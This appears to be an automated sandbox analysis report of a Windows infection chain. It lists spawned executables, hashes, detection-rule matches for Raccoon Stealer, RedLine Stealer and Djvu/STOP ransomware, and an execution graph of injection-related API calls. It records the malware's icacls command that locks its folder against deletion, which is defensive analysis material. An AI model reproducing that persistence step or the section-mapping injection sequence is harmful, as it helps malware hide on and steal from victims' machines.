                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\D8D3.exe
                                                                                    Imagebase:0x400000
                                                                                    File size:200192 bytes
                                                                                    MD5 hash:0CA939E14D58B13997144F0AF89ADEA9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000013.00000003.462471829.000000000087E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000013.00000003.465231730.000000000087E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000013.00000003.511550380.000000000087E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000013.00000003.517099850.0000000000874000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000013.00000003.464907460.000000000087E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000013.00000003.464370990.000000000087E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000013.00000003.462319085.000000000087E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000013.00000003.441770993.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000013.00000003.464693455.000000000087E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000013.00000003.441770993.000000000087E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000013.00000003.444370287.000000000087E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000013.00000003.446299900.000000000087E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Joe Sandbox ML

                                                                                    Target ID:20
                                                                                    Start time:19:45:08
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\Temp\llpb1133.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\llpb1133.exe"
                                                                                    Imagebase:0x140000000
                                                                                    File size:3657728 bytes
                                                                                    MD5 hash:81A0ECC23B44DA5116D397C0A3104A05
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Avira
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 77%, ReversingLabs

                                                                                    Target ID:21
                                                                                    Start time:19:45:09
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Windows\SysWOW64\icacls.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:icacls "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                    Imagebase:0xf40000
                                                                                    File size:29696 bytes
                                                                                    MD5 hash:FF0D1D4317A44C951240FAE75075D501
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language

                                                                                    Target ID:26
                                                                                    Start time:19:45:19
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 996 -s 520
                                                                                    Imagebase:0x360000
                                                                                    File size:434592 bytes
                                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language

                                                                                    Target ID:27
                                                                                    Start time:19:45:22
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\Temp\pliu.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\pliu.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:163840 bytes
                                                                                    MD5 hash:B9363486500E209C05F97330226BBF8A
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 85%, ReversingLabs

                                                                                    Target ID:28
                                                                                    Start time:19:45:22
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff745070000
                                                                                    File size:625664 bytes
                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language

                                                                                    Target ID:29
                                                                                    Start time:19:45:23
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\Temp\XandETC.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\XandETC.exe"
                                                                                    Imagebase:0x7ff6ec770000
                                                                                    File size:3890176 bytes
                                                                                    MD5 hash:3006B49F3A30A80BB85074C279ACC7DF
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 92%, ReversingLabs

                                                                                    Target ID:33
                                                                                    Start time:19:45:26
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe" --AutoStart
                                                                                    Imagebase:0x400000
                                                                                    File size:722944 bytes
                                                                                    MD5 hash:46909DA148DE57B2D85591626AEDBD76
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000021.00000002.516055302.00000000022BA000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 62%, ReversingLabs

                                                                                    Target ID:35
                                                                                    Start time:19:45:31
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe --Task
                                                                                    Imagebase:0x400000
                                                                                    File size:722944 bytes
                                                                                    MD5 hash:46909DA148DE57B2D85591626AEDBD76
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language

                                                                                    Target ID:39
                                                                                    Start time:19:45:35
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\Temp\3046.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\3046.exe" --Admin IsNotAutoStart IsNotTask
                                                                                    Imagebase:0x400000
                                                                                    File size:722944 bytes
                                                                                    MD5 hash:46909DA148DE57B2D85591626AEDBD76
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000027.00000002.517661661.00000000022E4000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000027.00000002.518320509.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000027.00000002.518320509.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Author: unknown

                                                                                    Target ID:40
                                                                                    Start time:19:45:35
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\Temp\pliu.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\pliu.exe" -h
                                                                                    Imagebase:0x400000
                                                                                    File size:163840 bytes
                                                                                    MD5 hash:B9363486500E209C05F97330226BBF8A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language

                                                                                    Target ID:41
                                                                                    Start time:19:45:36
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff745070000
                                                                                    File size:625664 bytes
                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language

                                                                                    Target ID:42
                                                                                    Start time:19:45:36
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe" --AutoStart
                                                                                    Imagebase:0x400000
                                                                                    File size:722944 bytes
                                                                                    MD5 hash:46909DA148DE57B2D85591626AEDBD76
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000002A.00000002.518333813.0000000002290000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000002A.00000002.518796436.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000002A.00000002.518796436.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Author: unknown

                                                                                    Reset < >

                                                                                      Execution Graph

                                                                                      Execution Coverage:2.8%
                                                                                      Dynamic/Decrypted Code Coverage:11.3%
                                                                                      Signature Coverage:6.2%
                                                                                      Total number of Nodes:567
                                                                                      Total number of Limit Nodes:11
                                                                                      execution_graph 8519 402d40 8520 402d65 8519->8520 8521 402f37 8520->8521 8522 401932 8 API calls 8520->8522 8522->8521 8889 40bbc2 8890 40bbcf 8889->8890 8891 4101af __calloc_crt 2 API calls 8890->8891 8892 40bbe9 8891->8892 8893 4101af __calloc_crt 2 API calls 8892->8893 8894 40bc02 8892->8894 8893->8894 8523 409d46 8524 409502 __getptd 2 API calls 8523->8524 8525 409d4e 8524->8525 8526 409a45 ___FrameUnwindToState 2 API calls 8525->8526 8527 409d9e 8526->8527 8528 409dd3 FindHandler 2 API calls 8527->8528 8529 409dbf _doexit 8528->8529 8823 409ac7 8826 4099fc 8823->8826 8825 409acf 8827 409a27 8826->8827 8828 409a0f 8826->8828 8829 409502 __getptd 2 API calls 8827->8829 8830 409502 __getptd 2 API calls 8828->8830 8833 409a3a 8828->8833 8831 409a2c 8829->8831 8834 409a1b _doexit 8830->8834 8832 409502 __getptd 2 API calls 8831->8832 8831->8833 8832->8833 8833->8825 8835 409502 __getptd 2 API calls 8834->8835 8836 40a617 8835->8836 8837 4102fe _abort 2 API calls 8836->8837 8838 40a639 _doexit 8837->8838 8838->8825 8867 401749 8868 4016cf 8867->8868 8869 4016db NtMapViewOfSection 8868->8869 8871 401724 8868->8871 8870 401702 NtMapViewOfSection 8869->8870 8869->8871 8870->8871 8508 40d4cb 8509 40d4d7 _doexit 8508->8509 8510 4101af __calloc_crt 2 API calls 8509->8510 8513 40d4f8 8510->8513 8511 40d5e0 _doexit __mtinitlocknum 8512 4101af __calloc_crt 2 API calls 8512->8513 8513->8511 8513->8512 8744 40964b 8746 40965b __crt_waiting_on_module_handle 8744->8746 8745 4097bb __mtterm 8746->8745 8760 40cdb9 8746->8760 8749 40923b __encode_pointer RtlEncodePointer 8750 409728 8749->8750 8751 40923b __encode_pointer RtlEncodePointer 8750->8751 8752 409738 8751->8752 8753 40923b __encode_pointer RtlEncodePointer 8752->8753 8754 409748 8753->8754 8755 40923b __encode_pointer RtlEncodePointer 8754->8755 8756 409758 __mtinit __decode_pointer 8755->8756 8756->8745 8757 4101af __calloc_crt 2 API calls 8756->8757 8758 409792 __decode_pointer 8757->8758 8758->8745 8759 4093a2 __getptd_noexit RtlEncodePointer 8758->8759 8759->8745 8761 4092ad _doexit RtlEncodePointer 8760->8761 8762 40cdc1 __init_pointers __initp_misc_winsig 8761->8762 8767 40a68a 8762->8767 8765 40923b __encode_pointer RtlEncodePointer 8766 40971d 8765->8766 8766->8749 8768 40923b __encode_pointer RtlEncodePointer 8767->8768 8769 40a694 8768->8769 8769->8765 8303 40a051 8312 40a606 8303->8312 8305 40a059 8307 40a072 8305->8307 8318 409fc8 8305->8318 8322 409a45 8307->8322 8309 40a097 8332 409cad 8309->8332 8311 40a0b8 8313 40a612 _doexit 8312->8313 8344 409502 8313->8344 8317 40a639 _doexit 8317->8305 8319 409fd4 _doexit 8318->8319 8388 409e49 8319->8388 8321 40a003 _doexit ___BuildCatchObjectHelper 8321->8307 8323 409a51 _doexit 8322->8323 8324 409502 __getptd 2 API calls 8323->8324 8331 409a71 __CallSettingFrame@12 8324->8331 8325 409ae6 8396 409b0b 8325->8396 8328 40a652 FindHandler 2 API calls 8328->8331 8329 409afc _doexit 8329->8309 8330 40a652 FindHandler 2 API calls 8330->8329 8331->8325 8331->8328 8333 409cb9 _doexit 8332->8333 8334 409502 __getptd 2 API calls 8333->8334 8335 409ce4 8334->8335 8336 409502 __getptd 2 API calls 8335->8336 8337 409cf2 8336->8337 8338 409502 __getptd 2 API calls 8337->8338 8339 409d00 8338->8339 8340 409502 __getptd 2 API calls 8339->8340 8341 409d0b 8340->8341 8401 409dd3 8341->8401 8343 409dbf _doexit 8343->8311 8357 409489 8344->8357 8347 409517 8349 4102fe 8347->8349 8348 40caff __amsg_exit RtlEncodePointer 8348->8347 8350 41031d 8349->8350 8352 410324 _abort 8349->8352 8351 40ce07 __NMSG_WRITE RtlEncodePointer 8350->8351 8351->8352 8355 410335 8352->8355 8369 410f0f 8352->8369 8379 40cd85 8355->8379 8356 410414 8356->8317 8358 409493 ___set_flsgetvalue 8357->8358 8359 4101af __calloc_crt 2 API calls 8358->8359 8361 4094dd 8358->8361 8360 4094b4 __decode_pointer 8359->8360 8360->8361 8363 4093a2 8360->8363 8361->8347 8361->8348 8364 4093ae _doexit __crt_waiting_on_module_handle 8363->8364 8365 40aed2 __lock RtlEncodePointer 8364->8365 8366 40941f __getptd_noexit 8365->8366 8367 40aed2 __lock RtlEncodePointer 8366->8367 8368 409440 _doexit __getptd_noexit ___addlocaleref 8367->8368 8368->8361 8370 410f1b _doexit 8369->8370 8371 409489 __getptd_noexit 2 API calls 8370->8371 8372 410f47 _siglookup __decode_pointer 8370->8372 8378 410f50 _doexit _raise 8370->8378 8371->8372 8373 410fed 8372->8373 8374 40cd85 _abort RtlEncodePointer 8372->8374 8372->8378 8375 40aed2 __lock RtlEncodePointer 8373->8375 8377 410ff8 8373->8377 8374->8373 8375->8377 8376 4092ad _doexit RtlEncodePointer 8376->8378 8377->8376 8377->8378 8378->8355 8382 40cc43 8379->8382 8381 40cd96 8381->8356 8383 40cc4f _doexit 8382->8383 8384 40aed2 __lock RtlEncodePointer 8383->8384 8387 40cc56 __decode_pointer 8384->8387 8385 40cd0f _doexit __initterm 8385->8381 8386 4092ad RtlEncodePointer _doexit 8386->8387 8387->8385 8387->8386 8390 409e55 FindHandler _doexit 8388->8390 8391 409ec2 _doexit ___BuildCatchObjectHelper 8390->8391 8392 40a652 8390->8392 8391->8321 8395 40a65e _doexit __decode_pointer 8392->8395 8393 40a606 FindHandler 2 API calls 8394 40a689 8393->8394 8395->8393 8397 409502 __getptd 2 API calls 8396->8397 8398 409b10 8397->8398 8399 409af2 8398->8399 8400 409502 __getptd 2 API calls 8398->8400 8399->8329 8399->8330 8400->8399 8402 409de1 8401->8402 8403 409502 __getptd 2 API calls 8402->8403 8404 409de7 8403->8404 8405 409502 __getptd 2 API calls 8404->8405 8406 409df5 FindHandler 8405->8406 8406->8343 8839 409ad1 8840 409a7c __CallSettingFrame@12 8839->8840 8841 409ae6 8840->8841 8844 40a652 FindHandler 2 API calls 8840->8844 8842 409b0b ___FrameUnwindToState 2 API calls 8841->8842 8843 409af2 8842->8843 8845 409afc _doexit 8843->8845 8846 40a652 FindHandler 2 API calls 8843->8846 8844->8840 8846->8845 8895 40abdd 8896 40abf6 8895->8896 8899 40a946 8896->8899 8898 40ac03 8901 40a95b 8899->8901 8900 41054f __isctype_l 2 API calls 8900->8901 8901->8900 8902 40a96d strtoxq __aulldvrm 8901->8902 8902->8898 8548 40cd6f 8549 40cc43 _doexit RtlEncodePointer 8548->8549 8550 40cd80 8549->8550 8770 40e66f 8771 40e67b _doexit 8770->8771 8772 409502 __getptd 2 API calls 8771->8772 8773 40e680 8772->8773 8774 40e6ae 8773->8774 8776 40e692 8773->8776 8775 40aed2 __lock RtlEncodePointer 8774->8775 8779 40e697 8775->8779 8777 409502 __getptd 2 API calls 8776->8777 8777->8779 8778 40e6a5 _doexit 8779->8778 8780 40caff __amsg_exit RtlEncodePointer 8779->8780 8780->8778 8551 40dd70 8553 40dd97 8551->8553 8552 411a07 ___crtGetStringTypeA 2 API calls 8554 40de11 8552->8554 8553->8552 8558 40de56 8553->8558 8555 411808 ___crtLCMapStringA 2 API calls 8554->8555 8556 40de31 8555->8556 8557 411808 ___crtLCMapStringA 2 API calls 8556->8557 8557->8558 8261 92b8a0 8262 92b8af 8261->8262 8265 92c040 8262->8265 8270 92c05b 8265->8270 8266 92c064 CreateToolhelp32Snapshot 8267 92c080 Module32First 8266->8267 8266->8270 8268 92c08f 8267->8268 8271 92b8b8 8267->8271 8272 92bcff 8268->8272 8270->8266 8270->8267 8273 92bd2a 8272->8273 8274 92bd73 8273->8274 8275 92bd3b VirtualAlloc 8273->8275 8274->8274 8275->8274 8407 40bc73 8412 410ad6 8407->8412 8410 40bc86 8421 4109fc 8412->8421 8414 40bc78 8414->8410 8415 4108ad 8414->8415 8416 4108b9 _doexit 8415->8416 8417 40aed2 __lock RtlEncodePointer 8416->8417 8418 4108c5 8417->8418 8419 41092e __fcloseall _doexit 8418->8419 8433 4146d5 8418->8433 8419->8410 8422 410a08 _doexit 8421->8422 8423 40aed2 __lock RtlEncodePointer 8422->8423 8424 410a17 _flsall 8423->8424 8425 410aaf _doexit _flsall 8424->8425 8427 4109b4 RtlEncodePointer RtlAllocateHeap __fflush_nolock 8424->8427 8428 40bcd4 8424->8428 8425->8414 8427->8424 8429 40bce1 8428->8429 8430 40bcf7 8428->8430 8431 40aed2 __lock RtlEncodePointer 8429->8431 8430->8424 8432 40bcea 8431->8432 8432->8424 8434 4146e1 _doexit 8433->8434 8438 4146f5 __fcloseall _doexit 8434->8438 8439 40bc93 8434->8439 8438->8418 8440 40bca5 8439->8440 8441 40bcbd 8439->8441 8440->8441 8442 40aed2 __lock RtlEncodePointer 8440->8442 8443 41465e 8441->8443 8442->8441 8444 41468e 8443->8444 8445 414672 8443->8445 8444->8445 8449 41094c 8444->8449 8445->8438 8447 41469a __fileno __freebuf 8453 4156c6 8447->8453 8450 410965 __fileno 8449->8450 8452 410987 8449->8452 8450->8452 8457 414e84 8450->8457 8452->8447 8454 4156d2 _doexit 8453->8454 8455 415ae8 ___lock_fhandle RtlEncodePointer 8454->8455 8456 4156da _doexit __close_nolock __close 8454->8456 8455->8456 8456->8445 8458 414e90 _doexit 8457->8458 8462 414e98 __locking _doexit 8458->8462 8463 415ae8 8458->8463 8460 414f08 8460->8462 8467 414751 8460->8467 8462->8452 8464 415af4 _doexit 8463->8464 8465 40aed2 __lock RtlEncodePointer 8464->8465 8466 415b20 ___lock_fhandle _doexit __mtinitlocknum 8464->8466 8465->8466 8466->8460 8468 414760 __stbuf __lseeki64_nolock __write_nolock 8467->8468 8469 409502 __getptd 2 API calls 8468->8469 8470 414787 __fassign __write_nolock __putwch_nolock 8468->8470 8469->8470 8470->8462 8781 40be74 8782 40be7e 8781->8782 8783 40be97 8782->8783 8785 40be41 8782->8785 8786 40be47 8785->8786 8787 40be52 8786->8787 8789 410b75 8786->8789 8787->8782 8796 410b85 __getbuf __stbuf __fileno 8789->8796 8790 410ca8 8793 414e84 __locking 2 API calls 8790->8793 8791 410c28 8792 410c3f 8791->8792 8797 410c5c 8791->8797 8794 414e84 __locking 2 API calls 8792->8794 8795 410b90 8793->8795 8794->8795 8795->8787 8796->8790 8796->8791 8796->8795 8797->8795 8799 4150c6 8797->8799 8800 4150d2 _doexit 8799->8800 8801 4150e3 _doexit __lseeki64_nolock __lseeki64 8800->8801 8802 415ae8 ___lock_fhandle RtlEncodePointer 8800->8802 8801->8795 8802->8801 8471 40e879 8472 40e897 8471->8472 8473 40e887 8471->8473 8475 40e764 8472->8475 8476 40e779 8475->8476 8477 40e785 8476->8477 8480 40e7d9 __isleadbyte_l 8476->8480 8478 40e79d 8477->8478 8482 41054f 8477->8482 8478->8473 8486 411808 8480->8486 8484 410563 __isleadbyte_l 8482->8484 8483 410570 8483->8478 8484->8483 8490 411a07 8484->8490 8487 41181b 8486->8487 8502 411463 8487->8502 8489 41183b 8489->8478 8491 411a1a 8490->8491 8494 41184d 8491->8494 8493 411a37 8493->8483 8495 41186e ___ansicp 8494->8495 8497 411886 __crtLCMapStringA_stat __freea 8495->8497 8498 415271 8495->8498 8497->8493 8499 41533b __freea 8498->8499 8501 4152b1 __crtLCMapStringA_stat 8498->8501 8499->8497 8500 4101af __calloc_crt 2 API calls 8500->8499 8501->8499 8501->8500 8503 411484 ___ansicp 8502->8503 8504 415271 ___convertcp 2 API calls 8503->8504 8507 4114f9 __crtLCMapStringA_stat __freea 8503->8507 8505 4116f0 __crtLCMapStringA_stat 8504->8505 8506 415271 ___convertcp 2 API calls 8505->8506 8505->8507 8506->8507 8507->8489 8571 402d7d 8572 402d83 8571->8572 8574 402deb 8571->8574 8573 401932 8 API calls 8575 402f37 8573->8575 8574->8573 8574->8575 8811 40ca7f 8812 40cabb 8811->8812 8813 40ca91 8811->8813 8813->8812 8814 40a606 FindHandler 2 API calls 8813->8814 8814->8812 8872 40df03 8873 40df0f _doexit 8872->8873 8874 409502 __getptd 2 API calls 8873->8874 8875 40df14 8874->8875 8876 40aed2 __lock RtlEncodePointer 8875->8876 8879 40df26 8875->8879 8876->8879 8877 40df34 _doexit 8878 40caff __amsg_exit RtlEncodePointer 8878->8877 8879->8877 8879->8878 8815 40be0d 8816 40be18 8815->8816 8817 40be2b 8815->8817 8816->8817 8818 41094c __flush 2 API calls 8816->8818 8818->8817 8197 40d191 8198 40d1a9 _wcslen 8197->8198 8201 40d1a1 8197->8201 8203 4101af 8198->8203 8200 4101af __calloc_crt 2 API calls 8202 40d1cd _wcslen __wsetenvp 8200->8202 8202->8200 8202->8201 8206 4101b8 8203->8206 8205 4101f5 8205->8202 8206->8205 8207 40ac08 8206->8207 8211 40ac14 ___sbh_alloc_block _doexit __calloc_impl 8207->8211 8208 40acbd RtlAllocateHeap 8208->8211 8210 40ac2c _doexit 8210->8206 8211->8208 8211->8210 8212 40aed2 8211->8212 8213 40aee7 8212->8213 8215 40aef9 8212->8215 8218 40ae0f 8213->8218 8215->8211 8216 40aeed 8216->8215 8226 40caff 8216->8226 8219 40ae1b _doexit 8218->8219 8223 40ae37 _doexit __malloc_crt 8219->8223 8231 40cfb2 8219->8231 8224 40aed2 __lock RtlEncodePointer 8223->8224 8225 40ae51 _doexit __mtinitlocknum 8223->8225 8224->8225 8225->8216 8227 40cfb2 __FF_MSGBANNER RtlEncodePointer 8226->8227 8228 40cb09 8227->8228 8229 40ce07 __NMSG_WRITE RtlEncodePointer 8228->8229 8230 40cb11 __decode_pointer 8229->8230 8230->8215 8232 40cfb9 __set_error_mode 8231->8232 8233 40ce07 __NMSG_WRITE RtlEncodePointer 8232->8233 8235 40ae30 8232->8235 8234 40cfde 8233->8234 8236 40ce07 __NMSG_WRITE RtlEncodePointer 8234->8236 8237 40ce07 8235->8237 8236->8235 8239 40ce1b __set_error_mode _strcat_s __NMSG_WRITE 8237->8239 8238 40cf76 8238->8223 8239->8238 8241 4110dd 8239->8241 8254 4092ad 8241->8254 8244 411188 __decode_pointer 8244->8238 8247 40923b __encode_pointer RtlEncodePointer 8248 411146 8247->8248 8249 40923b __encode_pointer RtlEncodePointer 8248->8249 8250 41115b 8249->8250 8251 40923b __encode_pointer RtlEncodePointer 8250->8251 8252 411170 8251->8252 8252->8244 8253 40923b __encode_pointer RtlEncodePointer 8252->8253 8253->8244 8255 40923b __encode_pointer RtlEncodePointer 8254->8255 8256 4092b4 8255->8256 8256->8244 8257 40923b 8256->8257 8258 40924f __crt_waiting_on_module_handle 8257->8258 8259 4092a7 8258->8259 8260 40929f RtlEncodePointer 8258->8260 8259->8247 8260->8259 8514 409892 8515 4101af __calloc_crt 2 API calls 8514->8515 8516 40989e 8515->8516 8517 40923b __encode_pointer RtlEncodePointer 8516->8517 8518 4098a6 8517->8518 8863 40be9a 8864 40beab 8863->8864 8865 40beb1 8864->8865 8866 40be41 RtlEncodePointer RtlAllocateHeap _write_multi_char 8864->8866 8866->8864 8278 402e9b 8281 402ea1 8278->8281 8279 402f37 8281->8279 8282 401932 8281->8282 8283 401943 8282->8283 8284 401986 Sleep 8283->8284 8285 4019a1 8284->8285 8287 4019b2 8285->8287 8288 401558 8285->8288 8287->8279 8289 401567 8288->8289 8290 401608 NtDuplicateObject 8289->8290 8297 401724 8289->8297 8291 401625 NtCreateSection 8290->8291 8290->8297 8292 4016a5 NtCreateSection 8291->8292 8293 40164b NtMapViewOfSection 8291->8293 8294 4016d1 8292->8294 8292->8297 8293->8292 8295 40166e NtMapViewOfSection 8293->8295 8296 4016db NtMapViewOfSection 8294->8296 8294->8297 8295->8292 8298 40168c 8295->8298 8296->8297 8299 401702 NtMapViewOfSection 8296->8299 8297->8287 8298->8292 8299->8297 8579 40a91b 8580 40a934 8579->8580 8583 40a6ec 8580->8583 8585 40a701 8583->8585 8584 41054f __isctype_l 2 API calls 8584->8585 8585->8584 8586 40a713 8585->8586 8587 40951c 8588 409528 _doexit 8587->8588 8589 40aed2 __lock RtlEncodePointer 8588->8589 8592 4095e6 _doexit ___freetlocinfo ___removelocaleref __freefls@4 8588->8592 8590 4095ad __freefls@4 8589->8590 8591 40aed2 __lock RtlEncodePointer 8590->8591 8591->8592 8593 40a520 8594 409502 __getptd 2 API calls 8593->8594 8595 40a52d 8594->8595 8596 40a571 8595->8596 8597 40a594 8595->8597 8600 40a58f 8595->8600 8599 409a45 ___FrameUnwindToState 2 API calls 8596->8599 8596->8600 8597->8600 8601 40a1bc 8597->8601 8599->8600 8602 40a1db 8601->8602 8603 40a652 FindHandler 2 API calls 8602->8603 8605 40a1f5 8602->8605 8603->8605 8604 40a4e8 8607 409502 __getptd 2 API calls 8604->8607 8611 409502 __getptd 2 API calls 8605->8611 8619 40a2d0 FindHandler ___TypeMatch std::bad_exception::bad_exception 8605->8619 8606 40a4cf 8660 40a0c8 8606->8660 8610 40a4f0 8607->8610 8608 40a606 FindHandler 2 API calls 8608->8619 8612 40a4fe 8610->8612 8613 40a652 FindHandler 2 API calls 8610->8613 8614 40a23c 8611->8614 8612->8600 8613->8612 8614->8612 8615 409502 __getptd 2 API calls 8614->8615 8616 40a24e 8615->8616 8617 409502 __getptd 2 API calls 8616->8617 8620 40a25c 